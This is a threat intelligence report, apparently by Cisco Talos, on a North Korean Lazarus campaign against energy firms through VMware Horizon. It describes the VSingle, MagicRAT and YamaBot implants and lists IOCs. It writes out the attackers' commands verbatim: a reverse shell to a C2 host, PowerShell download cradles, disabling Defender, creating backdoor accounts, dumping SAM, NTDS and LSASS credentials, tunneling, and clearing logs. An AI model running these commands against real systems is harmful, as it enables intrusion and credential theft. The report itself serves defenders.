  • This campaign involved the exploitation of vulnerabilities in VMWare Horizon to gain an initial foothold into targeted organizations.
  • Targeted organizations include energy providers from around the world, including those headquartered in the United States, Canada and Japan.
  • The campaign is meant to infiltrate organizations around the world for establishing long term access and subsequently exfiltrating data of interest to the adversary's nation-state.
  • Talos has discovered the use of two known families of malware in these intrusions — VSingle and YamaBot.
  • Talos has also discovered the use of a recently disclosed implant we're calling "MagicRAT" in this campaign.



Introduction


Cisco Talos observed North Korean state-sponsored APT Lazarus Group conducting malicious activity between February and July 2022. Lazarus has been previously attributed to the North Korean government by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The entry vectors involve the successful exploitation of vulnerabilities in VMWare products to establish initial footholds into enterprise networks, followed by the deployment of the group's custom malware implants, VSingle and YamaBot. In addition to these known malware families, we have also discovered the use of a previously unknown malware implant we're calling "MagicRAT."

This campaign was previously partially disclosed by other security firms, but our findings reveal more details about the adversary's modus operandi. We have also observed an overlap of command and control (C2) and payload-hosting infrastructure between our findings and the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) June advisory that detailed continued attempts from threat actors to compromise vulnerable VMWare Horizon servers.

In this research, we illustrate Lazarus Group's post-exploitation tactics, techniques and procedures (TTPs) to establish a foothold, perform initial reconnaissance, deploy bespoke malware and move laterally across infected enterprises. We also provide details about the activities performed by the attackers when the VSingle backdoor is instrumented on the infected endpoints.

In this campaign, Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.




Attribution


Cisco Talos assesses with high confidence these attacks have been conducted by the North Korean state-sponsored threat actor Lazarus Group. During our investigations, we identified three distinct RATs being employed by the threat actors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese CERT (JPCERT/CC) recently published reports (VSingle, YamaBot), describing them in detail and attributed the campaigns to the Lazarus threat actor.

The TTPs used in these attacks also point to the Lazarus threat actor. The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of their toolkit from web servers. The same initial vector, URL patterns and similar subsequent hands-on-keyboard activity have been described in this report from AhnLab from earlier this year. There are also overlapping IOCs between the campaign described by AhnLab and the current campaign, such as the IP address 84[.]38.133[.]145, which was used as a hosting platform for the actors' malicious tools. Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus. Additionally, we've also observed similarities in TTPs disclosed by Kaspersky attributed to the Andariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware. While Kaspersky discovered the use of Dtrack and Maui, we've observed the use of VSingle, YamaBot and MagicRAT.

Cisco Talos acknowledges that when analyzed individually, the attribution evidence only reaches medium-confidence, however, we're raising our confidence level when analyzing all these points in the context of the campaign and victims.


Campaign


Cisco Talos has observed several attacks targeting multiple victims. In this section, we detail two specific attack instances that we assess have been the most representative of the playbooks employed by Lazarus in this campaign:

  • Victim 1: Illustrates the kill chain from exploitation to actions on objectives. This intrusion also illustrates the use of the VSingle implant.
  • Victim 2: Represents a kill chain similar to Victim 1 but in this instance, we observed the deployment of a new implant we're calling "MagicRAT" along with VSingle.


A third intrusion set worth noting here is one where we saw the use of a third bespoke implant known as YamaBot. YamaBot was recently disclosed and attributed to the Lazarus APT by the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC).





Victim No. 1: VSingle and beyond


In the case of the first victim, we observed the exploitation of publicly known vulnerabilities to ultimately deploy the VSingle backdoor on infected endpoints to establish long-term access.

In this specific instance, we also observed the actual instrumentation of VSingle implants to carry out additional malicious activities on the infected systems. The flow below provides an overview of the attacker's playbook, which will be detailed in the sections ahead.





Exploitation and foothold


Cisco Talos identified the exploitation of the Log4Shell vulnerability on VmWare Horizon public-facing servers as the initial attack vector [T1190]. The compromise is followed by a series of activities to establish a foothold [TA0001] on the systems before the attackers deploy additional malware and move laterally across the network. During our investigation, we discovered two different foothold payloads. In the first, the attackers abuse node.exe, which is shipped with VMware to execute the oneliner node.exe script below.

 C:"Program Files"\VMware"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(<Port>, '<C2_IP>', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"

This essentially opens an interactive reverse shell that attackers could use to issue arbitrary commands on the infected entry endpoint.

In another instance, we observed the attackers exploiting vulnerabilities in VMWare to launch custom PowerShell scripts on the infected endpoint via VMWare's ws_ConnectionServer.exe:

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://<remote_location>/<filename>.ps1')

Since VMWare Horizon is executed with administrator privileges, the attacker doesn't have to worry about elevating their privileges.

After the interactive shell is established, the attackers perform a preliminary reconnaissance on the endpoint to get network information and directory listings [T1083], [T1590], [T1518]:

ipconfig /all
dir c:"Program Files (x86)
dir c:"Program Files


The next step is the deactivation of the Windows Defender components [T1562]. This is done through registry key changes, WMIC commands and PowerShell commands. The list below contains the full list of methods Cisco Talos observed.

powershell -exec bypass -Command Get-MpPreference
powershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true
reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection /s /f DisableRealtimeMonitoring


Once the AV on the system has been bypassed using the reverse shell, the attackers then deploy the actual malware implant from a malware family known to be developed and operated by Lazarus called "VSingle."

The deployment consists of downloading a copy of the legitimate WinRAR utility from a remote location controlled by the attackers along with an additional payload (archive) [T1608]:

powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('<remote_location>\\rar.tmp', '<local_path>\\rar.exe')
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('<remote_location>\\update.tmp <local_path>\\java.tmp')
<local_path>\\rar.exe e <local_path>\\java.tmp <local_path_2> -hp!no!


The archive downloaded to the infected endpoint is decompressed and consists of the VSingle malware executable which is optionally renamed and then persisted on the endpoint by creating an auto-start service.


How is VSingle used?


Our investigations led to the discovery of commands fed to the VSingle backdoor by the attackers to carry out a variety of activities such as reconnaissance, exfiltration and manual backdooring.

The actor starts by performing additional reconnaissance tasks by running the commands below [T1083], [T1590].

Command Intent
systeminfo & ipconfig /all & netstat -naop tcp & tasklist & net user & net view & arp -a System Information Discovery [T1082]
query user System Information Discovery [T1082]
whoami System Information Discovery [T1082]
dir /a %appdata%\microsoft System Information Discovery [T1082]
dir /a C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft
cmd.exe /u /c dir /a c:\users\administrator
System Information Discovery [T1082]
cmd /C pwd
cmd /C dir
cmd /C cd c:\\Users\\<username>\Download & dir
cmd /C cd c:\\Users\\<username>\Downloads & dir
cmd /C cd c:\\Users\\<username> & dir
cmd /C cd c: & dir
cmd /C tree c:\\Users
System Information Discovery [T1082]
cmd.exe /u /c time /t
cmd.exe /u /c query session
System Information Discovery [T1082]


These commands will give the operators a solid understanding of the system they are in, including the installed software, network configuration and system users, among other things. This kind of information is crucial to preparing for lateral movement activities.

The attackers also force the system to cache credentials so that it is possible to harvest them afterward [T1003/005].

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f


The other configuration changes made to the victim host are intended to provide the attackers with their own admin-level users [T1136].

Command Intent
cmd.exe /u /c net user <userid> <password> /add Create user
cmd.exe /u /c reg add HKLM\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist /v <username> /t REG_DWORD /d 0 /f Add privileges
cmd.exe /u /c net localgroup Administrators /add <username>
cmd.exe /u /c net localgroup Remote Desktop Users /add <username>
Add privileges
cmd.exe /u /c net localgroup Administrateur /add <username>
cmd.exe /u /c net localgroup Administrateurs /add <username>
Add privileges
cmd.exe /u /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f System config - Allow multiple sessions
cmd.exe /u /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f System config - disable UAC
cmd.exe /u /c reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel /t REG_DWORD /d 0 /f System config - LAN Man compatibility


These could be used if the RAT is detected/removed or even provide the actors with an RDP access, avoiding the use of a malicious tool.

With VSingle in place, the attackers can access other systems with the help of two additional tools.

  • pvhost.tmp renamed to pvhost.exe, which is actually plink.exe, a utility from Putty that can create SSH tunnels between systems.
  • osc.tmp renamed to osc.exe, which we assess with high confidence is 3proxy. Unfortunately, Cisco Talos could not obtain a copy of the file.


These two tools working together create a proxy on the victim system which has its listening port "exported" to a port on a remote host. This mechanism allows the attacker to have a local proxy port that gives access to the victim network as if the attacker's box was on it directly.

First, the attackers start the osc.exe (3proxy) to listen on a loopback port (in this example, we chose 8118), with the command below.

C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft\osc.exe -i127.0.0.1 -p8118

This alone wouldn't help the attackers, they actually need to have port 8118, exposed on their own network that they can connect to. So, they created an SSH tunnel using Plink, but they forwarded a local port to a remote address, in this case, a remote server controlled by the attackers:

C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft\pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] <Remote_IP>

The option -R forwards the port 8118 on 127.0.0.1 to the remote server on port 18118.


VSingle RAT Analysis


The VSingle loader executable is an MFC-based backdoor that consists of multiple layers. The first is responsible for decoding and executing the next layer (layer 2), a shellcode in the memory of the implant process. The shellcode is simply an injector for the next layer (layer 3, also shellcode). The implant spawns a new "explorer.exe" process and injects shellcode (layer 3) into it for execution.

The layer 3 shellcode is injected into a newly spawned benign process, such as explorer.exe, which consists of decoding another layer (layer 4) of shellcode that is then executed in the benign process.

Layer 4 is the actual VSingle implant DLL loaded reflectively into the memory of the benign process.




The implant is simple in terms of functionalities and is basically a stager that enables the attackers to deploy more malware on the infected system. It also includes the ability to open a reverse shell that connects to the C2 server and allows untethered access to the attackers to the endpoint to execute commands via "cmd.exe."

Although a rather simple RAT, VSingle can download and execute additional plugins from the C2 server. These plugins can either be in the form of shellcode or script files of specific formats served by the C2. The image below shows the code used to execute a shellcode downloaded.


In-memory shellcode execution by the implant.

For simpler cases, the implant can receive executables or scripts, save them into a file in the %temp% directory and execute them on the endpoint. The implant supports the .vbs, .bat and .tmp files, since all of them are executed through "cmd /c." The .tmp files can also be loaded as executables (.exe).

The implant can achieve persistence for malware artifacts served and specified by the C2 server. The simpler mechanism is the creation of a file in the Startup folders, which is done in two different locations:

c:\Documents and Settings\%s\Start Menu\Programs\Startup\%s
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\


Additionally, there are three other ways available, all of which use the "cmd.exe /c" command, that the VSingle operators can use:

Command Intent
sc create "%s" DisplayName= "%s" type= own type= interact start= auto error= ignore binpath= "cmd.exe /k start \"\" \"%s\" Auto start Service Creation [T1543/003]
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "%s" /t REG_SZ /d "%s" /f Run registry key [T1547/001]
schTasks /Create /F /TN "%s" /TR "%s" /SC onlogon Scheduled task triggered at logon [T1053/005]
schtasks /create /tn <task_name> /tr C:\\Windows\\upsvc.exe /sc onstart /ru System /rl highest /f Scheduled task triggered at system start with high priority [T1053/005]



Victim No. 2: The discovery of MagicRAT


In another victim's network, we saw a similar chain of events: initial recon followed by disabling the AV software and the deployment of a bespoke implant. We also observed successful lateral movement into other endpoints in the enterprise.



What's unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems.

This implant called "MagicRAT" is outlined in a recently published post. The reverse interactive shell eventually downloads MagicRAT from a remote location.


MagicRAT Analysis


In this campaign, MagicRAT was configured with a different configuration file and path. It also reported to different C2 servers. The configuration directory is now called "MagicMon" in the current user's "AppData\Roaming" directory. As seen in the screenshot below, this folder creates and hosts an initialization file named "MagicSystem.ini." This INI file contains several configurations including the list of C2 URLs that can be used by the implant to send and receive commands and data.


INI file containing the list of base64 encoded C2 URLs.


Lateral Movement


During the first few days after the successful initial access, the attackers conducted limited reconnaissance of the endpoint and deployed two different malware families MagicRAT and VSingle on the infected endpoint to maintain covert access to the system. Just like with the first victim, the attackers then started to perform Active Directory (AD) related explorations (via impacket and VSingle) to identify potential endpoints to laterally move into. The table below illustrates the commands executed to perform such actions.

Command Intent
powershell.exe Get-NetUser 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 User Discovery [T1033]
powershell.exe Get-ADDomain 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 Account/Domain Discovery [T1087]
powershell.exe Get-ADUser <server> -Properties * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 User Discovery [T1033]
powershell.exe Get-ADUser -Filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 User Discovery [T1033]
powershell.exe Get-ADGroup -filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 Account/Domain Discovery [T1087]
powershell.exe Get-AdComputer -filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 System Information Discovery [T1082]
powershell.exe Get-ADComputer -filter {OperatingSystem -Like '*Windows 10*'} -property * | select name, operatingsystem System Information Discovery [T1082]
nslookup <remote_computername> Account/Domain Discovery [T1087]
powershell.exe Get-WMIObject -Class win32_operatingsystem -Computername <remote_computername> System Information Discovery [T1082]
powershell.exe Get-ADUser -Filter * | Select SamAccountName User Discovery [T1033]
powershell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount User Discovery [T1033]
powershell.exe Get-AdComputer -Filter * -Properties * | select Name, LastLogonDate, lastLogon, IPv4Address Account/Domain Discovery [T1087]


Once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify if they are reachable (with an occasional tracert). VSingle deployment on new hosts was done by using WMIC to start a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote system [T1608/001].

WMIC /node:<Computer_Name> process call create "powershell.exe (New-Object System.Net.Webclient).DownloadFile('<remote_location>/svhostw.exe','<local_path>\\svhostww.exe')"


In some infections, we observed the deployment of impacket tools on other endpoints to move laterally and establish an interactive shell.

This stage of the attacks was clearly manual work performed by a human operator. While trying to establish interactive remote console sessions, we can see the operators making errors on the commands.

Try # Command Result
1 Enter-PSSession <ComputerName> Failed attempt
2 Enter-PSSession Failed attempt
3 powershell.exe Enter-PSSession Correct command


The attackers typically take their time to explore the infected system by obtaining file listings of multiple directories of interest to them. When files of particular interest are found they are put into a .rar archive for exfiltration, typically via one of the custom-developed implants running on the system.


Victim No. 3: VSingle makes way for YamaBot


During one particular intrusion, the attackers first deployed VSingle on the endpoint. However, after the VSingle sample was detected, the attackers were at risk of losing access to the enterprise. Therefore, after repeated failed attempts to deploy VSingle on the endpoints, the attackers then deployed another updated copy of VSingle. After maintaining continued access for a while, the attackers then moved on to the use of another implant — YamaBot.

YamaBot is a custom-made GoLang-based malware family. It uses HTTP to communicate with its C2 servers. It typically begins by sending preliminary system information about the infected endpoint to the C2: computer name, username and MAC address.



YamaBot's helper function names.

This implant has standard RAT capabilities, including the ability to:

  • List files and directories.
  • Send process information to C2.
  • Download files from remote locations.
  • Execute arbitrary commands on the endpoints.
  • Uninstall itself.


YamaBot was recently attributed to the Lazarus APT group by JPCERT who provided an excellent analysis of the implant.


Credential Harvesting


Apart from the usual recon and deployment of the custom implants, we also observed Lazarus' use of completely different TTPs for credential harvesting. The attackers created backups of volumes that were then used to create a copy of the "ntds.dit" file for exfiltration containing Active Directory data.

Command Intent
vssadmin list shadows /for=C: ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.bat System Information Discovery [T1082]
vssadmin create shadow /For=C: ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.bat OS Credential Dumping: NTDS [T1003/003]
cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit <local_path>\phPzFvOU.tmp ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.bat OS Credential Dumping: NTDS [T1003/003]



The Variations in the playbook


The overall structure of the infection chains remained the same across multiple intrusions in this campaign, primarily consisting of the cyber kill chain that we illustrated at the beginning of the campaign section.

However, there were some key variations that consist of some optional activities conducted by the adversary in different intrusion sets. These variations include the use of:

  • Credential harvesting using tools such as Mimikatz and Procdump.
  • Proxy tools to set up SOCKs proxies.
  • Reverse tunneling tools such as PuTTY's plink.


It is therefore necessary to list all the TTPs used by the adversary across all the intrusions we've discovered in this campaign. This section provides an additional list of TTPs and commands used by the operators along with their corresponding MITRE ATT&CK IDs to help defenders better understand this APT's offensive playbook.


Note: There is some overlap between operations (common or similar commands) carried out via the reverse shell, the VSingle RAT and impacket tools. This could be because there might be multiple human operators manually executing their own set of commands based on their shift days and timings (without proper handover of information collected and percolated from one operator to another).


For example, in one instance, the attackers tried to obtain Active Directory information on one endpoint via PowerShell cmdlets. However, a day later, the attackers used adfind.exe to extract similar information on the same endpoint.

Disabling AV components


The threat actors used multiple variations of commands to query information about the installed antivirus software on the endpoints, followed by disabling the Windows Defender antivirus.

Command Intent
cmd /C wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayname Security Software Discovery [T1518/001]
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /format:list Security Software Discovery [T1518/001]
cmd.exe /Q /c wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe 1> \\127.0.0.1\ADMIN$\<log_file_name> 2>&1 Security Software Discovery [T1518/001]
cmd.exe /c powershell -exec bypass -Command Get-MpPreference Security Software Discovery [T1518/001]
powershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true Impair Defenses [T1562/001]
reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection /s /f DisableRealtimeMonitoring Impair Defenses [T1562/001]
powershell -exec bypass -Command Set-MpPreference -SubmitSamplesConsent NeverSendpowershell -exec bypass -Command Set-MpPreference -MAPSReporting Disable Impair Defenses [T1562/001]
cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyWare /t REG_DWORD /d 1 Impair Defenses [T1562/001]

Reconnaissance


During the reconnaissance and credential harvesting stage, the attackers gather information about the system, the network — including the domain — and the installed software. Using a WMIC command, the attackers also collect information about the logical drives of the infected systems.

Then, the attackers harvest and exfiltrate credentials. During the reconnaissance stage, the attackers specifically check if the RDP port is open. If it is and the attackers decrypt any of the harvested credentials, they would have direct access to the system without the need to install any other backdoor. The complete list of commands is provided in the table below.

Command Intent
cmd.exe /c ipconfig /all Network discovery [T1590]
cmd.exe /c dir c:"Program Files (x86) Installed software [T1518]
cmd.exe /c dir c:"Program Files Installed software [T1518]
cmd.exe /c systeminfo System Information Discovery [T1082]
cmd /C qwinsta User Discovery [T1033]
cmd /C nslookup Network discovery [T1590]
cmd /C netstat -noa | findstr 3389 Network discovery [T1590]
cmd /C net view /domain Domain discovery [T1087/002]
cmd /C wmic logicaldisk get deviceid, size System Information Discovery [T1082]
cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp System Information Discovery [T1082]
cmd.exe /Q /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:20 /q:*[System [(EventID=25)]] /rd:true /f:text 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 Query event logs - Get RDP session reconnection information
netsh advfirewall firewall add rule name=allow RemoteDesktop dir=in protocol=TCP localport=3389 action=allow Modify Firewall [T1562/004]
reg.exe add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 3389 /f Configure RDP [T1021/001]

Credential harvesting


In some intrusions, the attackers saved copies of registry hives for subsequent exfiltration for obtaining credentials and policy information.

Command Intent
cmd.exe /c reg save hklm\sam <local_path>\zsam.tmp Credential harvesting [T1003]
cmd.exe /c reg save hklm\security <local_path>\zsec.tmp Credential harvesting [T1003]
cmd.exe /c reg save hklm\system <local_path>\zsys.tmp Credential harvesting [T1003]
<local_path>\rar.exe a <local_path>\zzzzz.tmp <local_path>\zs*.tmp Archive Collected Data [T1560]
cmd.exe /c copy /y <local_path>\zzzzz.tmp c:"Program Files\"VMware View\server\broker\webapps\portal\webclient\z.tmp Archive Collected Data [T1560]

Active Directory (AD) Recon


The attackers also typically use a malicious batch (.bat) file called "adfind.bat" to execute adfind.exe on some of the infected endpoints to get AD information from the endpoints.

Command Intent
cmd.exe /c <local_path>\adfind.bat Remote System Discovery [T1018]
adfind.exe -f (objectcategory=person) Remote System Discovery [T1018]
adfind.exe -f objectcategory=computer Remote System Discovery [T1018]
adfind.exe -f (objectcategory=organizationalUnit) Remote System Discovery [T1018]
adfind.exe -f (objectcategory=group) Remote System Discovery [T1018]
adfind.exe -gcb -sc trustdmp Domain Trust Discovery [T1482]


We also observed the use of dsquery to obtain similar information.

Command Intent
cmd.exe /Q /c echo dsquery computer ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1 Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery group -name GroupName ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1 Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery computer -name ComputerName ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1 Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery user -name UserName ^> \\127.0.0.1\C$\<impacket_log_file>t 2^>^&1 Domain Account Discovery [T1087/002]

Unauthorized account creations


In most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they had initial access to. Similar activity was also seen being conducted via the VSingle implant as it was propagated across an enterprise.

Command Intent
net1 group /domain Domain discovery [T1087/002]
net1 user <username> <password> /domain Create Account [T1136/002]
net1 user <username> /active:yes /domain Create Account [T1136/002]
net1 group <groupname> /add /domain Create Account [T1136/002]
net1 group <groupname> <username> /add /domain Create Account [T1136/002]

Additional tools used

In some cases, the attackers deployed commonly used tools often seen from other threat actors.

Mimikatz


The attackers downloaded the Mimikatz tool from their server, inside a .rar archive protected with a password, which prevents any kind of detection by network intrusion prevention systems.

Command Intent
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/mi.tmp', '<local_path>\m.tmp') Download Payloads [T1608/001]
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/mi64.tmp', '<local_path>\mi.tmp') Download Payloads [T1608/001]
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/mm.rar', '<local_path>\mm.tmp') Download Payloads [T1608/001]
<local_path>\rar.exe e <local_path>\m.tmp <local_path>\ -p<password> Extract files [T1140]
<local_path>\mi.exe privilege::debug sekurlsa::logonPasswords exit OS Credential Dumping [T1003/001]

Procdump


Along with Mimikatz, the attackers also used procdump to dump the LSASS memory to a file on disk.

Command Intent
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/pd64.tmp', '<local_path>\pd.tmp') Download Payloads [T1608/001]
ren <local_path>\pd.tmp pd64.exe Rename files
<local_path>\pd64.exe -accepteula -ma lsass <local_path>\z_pd.dmp OS Credential Dumping [T1003/001]

Socks proxy


In another instance, the attackers downloaded and set up a SOCKS proxy on the local endpoint, including the use of 3proxy.

Command Intent
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('http://<remote_location>/spr.tmp', '<local_path>\spr.tmp') Download Payloads [T1608/001]
<local_path>\rar.exe e <local_path>\spr.tmp <local_path_2> -p<password> Extract files [T1140]
<local_path_2>\msconf.exe -i 84[.]38[.]133[.]145 -p <Port_number> Proxy [T1090]

Implant deployment and lateral movement


Across the first endpoints compromised in the enterprises, we observed the attackers downloading their custom implants from remote locations and deploying and persisting them on the systems.

Command Intent
WMIC /node:<Computer_Name> process call create "powershell.exe (New-Object System.Net.Webclient).DownloadFile('<remote_location>/svhostw.exe','<local_path>\\svhostww.exe')" Download Payloads [T1608/001]
sc create <service_name> type= own type= interact start= auto error= ignore binpath= cmd /K start <local_path_2>\\svhostww.exe Persistence [T1543/003]


On the endpoints that were breached by performing lateral movement from an already compromised host, the implants were deployed either from a remote external location or the source host itself by opening up interactive shells and the use of implacket tools:

Command Intent
powershell.exe Enter-PSSession Remote Access [T1219]
powershell.exe Invoke-Command -ComputerName <ComputerName> -ScriptBlock {cmd.exe /c dir} Remote Access [T1219]
python wmiexec.py <userid>:<password>@<local_IP_of_another_endpoint> 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1 Remote Access [T1219]

Cleanup


Once the backdoors and implants were persisted and activated on the endpoint, the reverse shell used to perform cleanup [T1070], this included deleting all files in the infection folder along with the termination of the powershell tasks. The attacker-created accounts were removed and, finally, the Windows Event logs [T1070/001] would be purged with the command below.

for /F tokens=* %1 in ('wevtutil.exe el') DO wevtutil.exe cl %1 1> \\127.0.0.1\ADMIN$\<log_file_name> 2>&1

Manual operations


In multiple instances, the attackers mistyped commands on the infected endpoint via the reverse shell, indicating that the commands were being served by an operator manually operating the infections:

ip config /all
net suer
netstat -noa | finstr 3389
powrshell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount
powrshell.exe Get-AdComputer -Filter * -Properties * | select Name, LastLogonDate, lastLogon, IPv4Address



Coverage


Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Orbital Queries


Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here and here.


IOCS

The IOC list is also available in Talos' Github repo here.

VSingle

586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730

MagicRAT

8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4

YamaBot

f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb

Procdump

16F413862EFDA3ABA631D8A7AE2BFFF6D84ACD9F454A7ADAA518C7A8A6F375A5
05732E84DE58A3CC142535431B3AA04EFBE034CC96E837F93C360A6387D8FAAD

Mimikatz

6FBB771CD168B5D076525805D010AE0CD73B39AB1F4E6693148FE18B8F73090B
912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9
CAF6739D50366E18C855E2206A86F64DA90EC1CDF3E309AEB18AC22C6E28DC65

3Proxy

2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e

PuTTY plink

2AA1BBBE47F04627A8EA4E8718AD21F0D50ADF6A32BA4E6133EE46CE2CD13780
5A73FDD0C4D0DEEA80FA13121503B477597761D82CF2CFB0E9D8DF469357E3F8

Adfind

C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3

IPs

104[.]155[.]149[.]103
40[.]121[.]90[.]194
185[.]29[.]8[.]162
146[.]4[.]21[.]94
46[.]183[.]221[.]109
84[.]38[.]133[.]145
109[.]248[.]150[.]13
155[.]94[.]210[.]11
192[.]186[.]183[.]133
54[.]68[.]42[.]4
84[.]38[.]133[.]145
213[.]180[.]180[.]154

URLS

hxxp[://]104[.]155[.]149[.]103/2-443[.]ps1
hxxp[://]104[.]155[.]149[.]103/8080[.]ps1
hxxp[://]104[.]155[.]149[.]103/mi64[.]tmp
hxxp[://]104[.]155[.]149[.]103/mi[.]tmp
hxxp[://]104[.]155[.]149[.]103/mm[.]rar
hxxp[://]104[.]155[.]149[.]103/pd64[.]tmp
hxxp[://]104[.]155[.]149[.]103/rar[.]tmp
hxxp[://]104[.]155[.]149[.]103/spr[.]tmp
hxxp[://]104[.]155[.]149[.]103/t[.]tmp
hxxp[://]104[.]155[.]149[.]103/update[.]tmp
hxxp[://]109[.]248[.]150[.]13:8080/1
hxxp[://]146[.]4[.]21[.]94/tmp/data_preview/virtual[.]php
